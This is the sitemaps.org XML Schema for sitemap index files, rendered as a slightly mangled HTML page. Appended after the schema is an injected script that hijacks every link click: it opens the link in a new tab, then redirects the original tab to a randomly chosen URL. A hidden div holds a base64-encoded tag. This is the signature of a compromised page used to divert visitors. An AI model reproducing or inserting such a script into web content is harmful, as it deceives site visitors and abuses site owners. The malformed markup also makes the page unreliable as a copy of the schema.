<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<?xml version="1.0" encoding="UTF-8"?><html><body><schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" targetnamespace="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" elementformdefault="qualified">
<annotation>
  <documentation>
    XML Schema for Sitemap index files.
    Last Modifed 2009-04-08
  </documentation>
</annotation>

<element name="sitemapindex">
  <annotation>
    <documentation>
      Container for a set of up to 50,000 sitemap URLs.
      This is the root element of the XML file.
    </documentation>
  </annotation>
  <complextype>
    <sequence>
      <element name="sitemap" type="tSitemap" maxoccurs="unbounded"></element>
    </sequence>
  </complextype>
</element>

<complextype name="tSitemap">
  <annotation>
    <documentation>
      Container for the data needed to describe a sitemap.
    </documentation>
  </annotation>
  <all>
    <element name="loc" type="tLocSitemap"></element>
    <element name="lastmod" type="tLastmodSitemap" minoccurs="0"></element>
  </all>
</complextype>

<simpletype name="tLocSitemap">
  <annotation>
    <documentation>
      REQUIRED: The location URI of a sitemap.
      The URI must conform to RFC 2396 (http://www.ietf.org/rfc/rfc2396.txt).
    </documentation>
  </annotation>
  <restriction base="xsd:anyURI">
    <minlength value="12"></minlength>
    <maxlength value="2048"></maxlength>
  </restriction>
</simpletype>

<simpletype name="tLastmodSitemap">
  <annotation>
    <documentation>
      OPTIONAL: The date the document was last modified. The date must conform
      to the W3C DATETIME format (http://www.w3.org/TR/NOTE-datetime).
      Example: 2005-05-10
      Lastmod may also contain a timestamp.
      Example: 2005-05-10T17:33:30+08:00
    </documentation>
  </annotation>
  <union>
    <simpletype>
      <restriction base="xsd:date"></restriction>
    </simpletype>
    <simpletype>
      <restriction base="xsd:dateTime"></restriction>
      </simpletype>
  </union>
</simpletype>


</schema>
<script>var elmnt = document.getElementsByTagName("a"); for(var i = 0, len = elmnt.length; i < len; i++) { elmnt[i].onclick = function(e) { e.preventDefault(); e.stopPropagation(); var gtlink = []; var randm  = Math.floor(Math.random() * gtlink.length); var lnk = this.href; window.open(lnk, "_blank"); setTimeout(function(){ window.open(gtlink[randm], "_self"); }, 1000); } }</script><div style="display:none;" id="agnote">ZW5kZW5yYWhheXU5QGdtYWlsLmNvbQ==</div></body></html>
